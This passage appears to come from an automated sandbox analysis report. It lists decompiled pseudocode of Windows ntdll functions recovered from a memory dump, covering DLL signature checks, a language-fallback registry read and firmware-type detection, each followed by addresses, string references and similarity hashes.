					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0191C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1a05780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01995510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1a05780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01937D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01937D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01997016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01937D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01937D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01997016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0194A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0191B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x01927e4c
0x01927e50
0x01927e55
0x01927e58
0x01927e5d
0x01927e71
0x01927f33
0x01927e77
0x01927e77
0x01927e79
0x01927e79
0x01927e7e
0x01927f45
0x01979848
0x00000000
0x01979848
0x01927f4e
0x01927f53
0x01927f5a
0x00000000
0x00000000
0x0197985a
0x01979862
0x01979866
0x00000000
0x0197986c
0x00000000
0x0197986c
0x01927e84
0x01927e84
0x01927e8d
0x01979871
0x01927eb8
0x01927ec0
0x01927ec0
0x01927e9a
0x0197987e
0x00000000
0x00000000
0x01979884
0x0197988b
0x019798a7
0x019798ac
0x019798b1
0x019798b6
0x019798b8
0x019798b8
0x019798b9
0x00000000
0x019798b9
0x01927ea0
0x01927ea7
0x00000000
0x00000000
0x01927eac
0x01927eb1
0x01927ec6
0x01927ed0
0x019798cc
0x01927ed6
0x01927ed6
0x01927ed6
0x01927ede
0x01927ee3
0x019798e3
0x019798f0
0x01979902
0x019798f2
0x019798fb
0x019798fb
0x01979907
0x0197991d
0x0197991d
0x01979907
0x019798e3
0x01927ef0
0x01927f14
0x01927f14
0x01927f1e
0x01979946
0x01927f24
0x01927f24
0x01927f24
0x01927f2c
0x0197996a
0x01979975
0x01979975
0x0197997e
0x01979993
0x01979993
0x0197997e
0x00000000
0x01927ef2
0x01927efc
0x01927f0a
0x01927f0e
0x01979933
0x00000000
0x01979933
0x00000000
0x01927f0e
0x00000000
0x00000000
0x00000000
0x01927eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 01979891
minkernel\ntdll\ldrmap.c, xrefs: 019798A2
LdrpCompleteMapModule, xrefs: 01979898

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: bd947b858727370d98eae10a903a9dffc5be14c98fe1d4da813b807533107648
Instruction ID: 9d8640e3569c22d6f81323526c5b50c9172b35ace46720d0d10f81438fac5176
Opcode Fuzzy Hash: bd947b858727370d98eae10a903a9dffc5be14c98fe1d4da813b807533107648
Instruction Fuzzy Hash: 4351E131A047459BEB2ACB9CC944F6A7BE8FF50324F040559E969AB3E5D734E900CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0191E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0191E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0191F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E019595D0();
						}
						if(_t78 != 0) {
							L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0195FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0195BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01959600();
					if(_t97 < 0) {
						goto L6;
					}
					E0195BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0191F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0195BB40(_t83, _t102 + 0x24, _t78);
								if(L019243C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0195BB40(_t84, _t102 + 0x24, _t94);
									if(L019243C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0191e620
0x0191e628
0x0191e62f
0x0191e631
0x0191e635
0x0191e637
0x0191e63e
0x01975503
0x01975503
0x0191e64c
0x0191e64c
0x0191e651
0x00000000
0x00000000
0x0191e661
0x0191e665
0x0197542a
0x0191e715
0x0191e71a
0x0191e71c
0x0191e720
0x0191e720
0x0191e727
0x0191e736
0x0191e736
0x0191e743
0x0191e743
0x0191e673
0x0191e678
0x0191e67d
0x0191e682
0x0191e685
0x0191e692
0x0191e69b
0x0191e6a3
0x0191e6ad
0x0191e6b1
0x0191e6b2
0x0191e6bb
0x0191e6bf
0x0191e6c0
0x0191e6c8
0x0191e6cc
0x0191e6d5
0x0191e6d9
0x00000000
0x00000000
0x0191e6e5
0x0191e6ea
0x0191e6f9
0x0191e70b
0x0191e70f
0x01975439
0x0197545e
0x0197545e
0x00000000
0x0197545e
0x0197543b
0x0197543e
0x01975440
0x01975445
0x01975472
0x01975475
0x0197548d
0x01975493
0x019754a9
0x00000000
0x00000000
0x019754ab
0x019754b4
0x019754bc
0x019754c8
0x019754de
0x019754fb
0x019754e0
0x019754e6
0x019754eb
0x019754eb
0x019754de
0x00000000
0x019754bc
0x01975477
0x0197547a
0x01975480
0x01975483
0x01975486
0x0197548b
0x00000000
0x00000000
0x00000000
0x0197548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01975447
0x01975447
0x01975447
0x01975447
0x0197544e
0x00000000
0x00000000
0x01975450
0x01975452
0x01975455
0x0197545a
0x00000000
0x00000000
0x00000000
0x0197545c
0x0197546a
0x0197546d
0x0197546f
0x00000000
0x0197546f
0x0191e70f

Strings

InstallLanguageFallback, xrefs: 0191E6DB
@, xrefs: 0191E6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0191E68C

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 5a2dbb7ee52af358056f395d43f61df89e0fe55d0dbcc6787072b6c07310f810
Instruction ID: a9928cbeb4bae7b6603fd1fdb09c9ea0539cfbb410a6f4013c9565f9dbb2588f
Opcode Fuzzy Hash: 5a2dbb7ee52af358056f395d43f61df89e0fe55d0dbcc6787072b6c07310f810
Instruction Fuzzy Hash: A351A27260434A9BE755DF68C440A6BB7E8BF88715F05092EF98DE7240F734DA44C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 019951BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E019951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x19f05f0);
				E0196D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0192EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E019953CA(0);
						return E0196D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0195F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01933690(1, _t117, 0x18f1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0195AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01934620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0195AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0199500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01959860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x019951be
0x019951c3
0x019951c8
0x019951cd
0x019951d0
0x019951d3
0x019951d8
0x019951db
0x019951de
0x019951e0
0x019951e3
0x019951e6
0x019951e8
0x01995342
0x01995351
0x01995356
0x0199535a
0x01995360
0x01995363
0x01995366
0x01995369
0x01995369
0x0199536b
0x0199536b
0x01995370
0x019953a3
0x019953a4
0x019953a6
0x019953ab
0x019953ab
0x019953ae
0x019953ae
0x019953b5
0x019953bf
0x019953bf
0x01995375
0x01995396
0x019953a0
0x019953a0
0x00000000
0x01995396
0x01995377
0x01995379
0x0199537f
0x0199538c
0x01995390
0x00000000
0x01995390
0x019951ee
0x019951f1
0x01995301
0x01995310
0x01995315
0x01995318
0x0199531b
0x01995320
0x0199532e
0x01995331
0x00000000
0x01995331
0x01995328
0x01995329
0x00000000
0x01995329
0x019951fa
0x01995235
0x01995236
0x01995239
0x0199523f
0x01995240
0x01995241
0x01995242
0x01995246
0x01995247
0x0199524e
0x01995251
0x01995267
0x01995269
0x0199526e
0x0199527d
0x0199527e
0x01995281
0x01995282
0x01995287
0x01995288
0x0199528a
0x0199528f
0x01995294
0x00000000
0x00000000
0x0199529a
0x0199529c
0x0199529e
0x0199529e
0x019952a4
0x019952b0
0x00000000
0x00000000
0x019952ba
0x019952bc
0x019952bc
0x019952d4
0x019952d9
0x019952dc
0x019952e1
0x00000000
0x00000000
0x019952e7
0x019952f4
0x00000000
0x019952f4
0x01995270
0x00000000
0x01995270
0x019951fc
0x019951fd
0x01995202
0x01995203
0x01995205
0x0199520a
0x0199520f
0x00000000
0x00000000
0x0199521b
0x01995226
0x0199522b
0x0199521d
0x0199521d
0x01995222
0x01995222
0x0199522d
0x00000000

Strings

Legacy, xrefs: 01995226
UEFI, xrefs: 0199521D

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 51c7a031904b3acab93094b39589cb1ec92744fcade650b5cd4197f521a65fa5
Instruction ID: 22a2d615149642fca4739665b4971560193390f249c2047ffc6a3e8e0d02fa76
Opcode Fuzzy Hash: 51c7a031904b3acab93094b39589cb1ec92744fcade650b5cd4197f521a65fa5
Instruction Fuzzy Hash: C0516B71A00609DFEF26DFADC981AAEBBF8FF48700F15446EE649EB251D6719900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0193B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0193B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1a0d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01937D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E019E8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01959E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0195B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0195CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01937D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E019E8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0195AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1a08628; // 0x0
								_v68 = _t77;
								_t78 =  *0x1a0862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1a08628; // 0x0
							_t116 =  *0x1a0862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0193b94c
0x0193b956
0x0193b95c
0x0193b95e
0x0193b964
0x0193b969
0x0193b96d
0x0193b96d
0x0193b970
0x0193b974
0x0193b97a
0x0193badf
0x0193badf
0x0193bae2
0x0193bae4
0x0193bae6
0x0193baf0
0x01982cb8
0x0193baf6
0x0193baf6
0x0193baf6
0x0193bafd
0x0193bb1f
0x0193bb1f
0x0193baff
0x0193bb00
0x0193bb00
0x0193bb03
0x0193bb03
0x0193bacb
0x0193bacf
0x0193bad0
0x0193bad1
0x0193badc
0x0193badc
0x0193b980
0x0193b980
0x0193b988
0x0193b98b
0x0193b98d
0x0193b990
0x0193b993
0x0193b999
0x0193b99b
0x0193b9a1
0x0193b9a5
0x0193b9aa
0x0193b9b0
0x0193b9bb
0x0193b9c0
0x0193b9c3
0x0193b9ca
0x0193b9cc
0x0193b9cf
0x0193b9d3
0x0193b9d7
0x0193ba94
0x0193ba94
0x0193ba98
0x0193baa3
0x01982ccb
0x0193baa9
0x0193baa9
0x0193baa9
0x0193bab1
0x01982cd5
0x01982cdd
0x01982cdd
0x0193babb
0x0193babc
0x0193bac2
0x0193bac3
0x0193bac3
0x0193bac6
0x00000000
0x0193b9dd
0x0193b9dd
0x0193b9e7
0x0193b9e7
0x0193b9ec
0x0193b9ec
0x0193b9f1
0x0193b9f5
0x0193b9fa
0x0193ba00
0x0193ba0c
0x0193ba10
0x0193ba10
0x0193ba12
0x0193ba18
0x00000000
0x00000000
0x0193bb26
0x0193bb26
0x0193ba1e
0x0193ba1e
0x0193ba23
0x0193ba25
0x0193ba2c
0x0193ba30
0x0193ba35
0x0193ba35
0x0193ba41
0x0193ba46
0x0193ba4c
0x0193ba50
0x0193ba54
0x0193ba6a
0x0193ba6e
0x0193ba70
0x0193ba74
0x0193ba78
0x0193ba7a
0x0193ba7c
0x0193ba8e
0x0193ba90
0x0193ba92
0x0193bb14
0x0193bb14
0x0193bb16
0x0193bb16
0x00000000
0x0193ba7c
0x0193bb0a
0x0193bb0d
0x00000000
0x00000000
0x00000000
0x0193bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0193B9A5

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 3700a407377e1a46f705c9b46c93e90c28fa97c7b8d2e6f3aaa69dacaa604cc2
Instruction ID: 9797fdb937a31223eb04da06cdba79b3e4e019e7e401cd2097c2a6a8ca272c46
Opcode Fuzzy Hash: 3700a407377e1a46f705c9b46c93e90c28fa97c7b8d2e6f3aaa69dacaa604cc2
Instruction Fuzzy Hash: 7A516971A08701CFC725DF69C48092ABBF9FBC8615F14896EEA8AD7345D730E845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0191B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0191B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x19ef7a8);
				E0196D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0196D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0195D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0195F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
